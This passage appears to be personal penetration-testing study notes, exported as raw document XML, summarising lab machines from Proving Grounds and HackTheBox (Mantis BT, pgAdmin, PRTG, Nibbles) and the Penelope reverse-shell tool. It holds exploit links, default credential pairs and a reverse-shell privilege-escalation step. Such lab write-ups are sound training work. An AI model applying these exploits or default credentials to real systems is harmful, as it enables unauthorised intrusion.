      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice where we were able to get LFI and then read Mantis Bug Tracker config file that gave us creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once we authenticated, we found a Mantis BT 2.5.2 exploit for RCE. It involved putting a reverse shell in a config file and then visiting the config file using the URL </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1385">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/48818</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pgAdmin Version 8.3 (pgAdmin 8.3) was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1386">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice. They used the exploit for RCE, and they had creds, but idk if creds were necessary. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1387">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="851"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">prtg network monitor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (18.1.37.13946) was exploited in Netmon HTB. The exploit works for versions prior to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">18.2.39</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="851"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1388">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="851"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's a metasploit module and requires credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="851"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We got credentials, but there are default creds for prtg network monitor that work worth trying:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="851"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">prtgadmin:prtgadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AF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AFE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cxdioxsr717t" w:id="544"/>
      <w:bookmarkEnd w:id="544"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nibbles:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webpage had nothing, but page source had a comment to a directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accessed Nibbleblog 4.0.3 which had CVE-2015-6967</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There is a metasploit module that can get reverse shell (search nibbleblog)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Somehow, we just HAD TO KNOW that the username and password was admin:nibbles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the metasploit module and then get reverse shell for user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See that you can run a file, but you also have edit privilege, so you can delete all content in file and then replace it with this script to give you root privilege:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="845"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, get root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Builder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="847"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one was all about Jenkins!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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0E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5jghjoax5g2z" w:id="545"/>
      <w:bookmarkEnd w:id="545"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penelope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B10">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spawn doesn't work for Windows!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B11">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B12">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look into </w:t>
      </w:r>
      <w:hyperlink r:id="rId1389">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for upgraded shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It allows you to open up another rev shell connection quickly! Really great if attack vector is long, and you are afraid your gonna accidentally close terminal, so just create a new rev shell connection on another tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run winPEAS and linPEAS in background without uploading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I think it's like evil-winrm and allows for "upload" and "download" stuff locally, so no need to CURL and stuff everytime!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For every shell that may be killed for some reason, automatically a new one is spawned. This gives us a kind of persistence with the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Added the ability to bypass SSL verification for Internet downloads. So, you can try downloading exploits from web directly without having to first download on Kali first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add penelope to path so that you can just run "penelope" to open it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir -p ~/.local/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv ~/penelope.py ~/.local/bin/penelope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x ~/.local/bin/penelope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'export PATH="$PATH:$HOME/.local/bin"' &gt;&gt; ~/.zshrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">source ~/.zshrc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
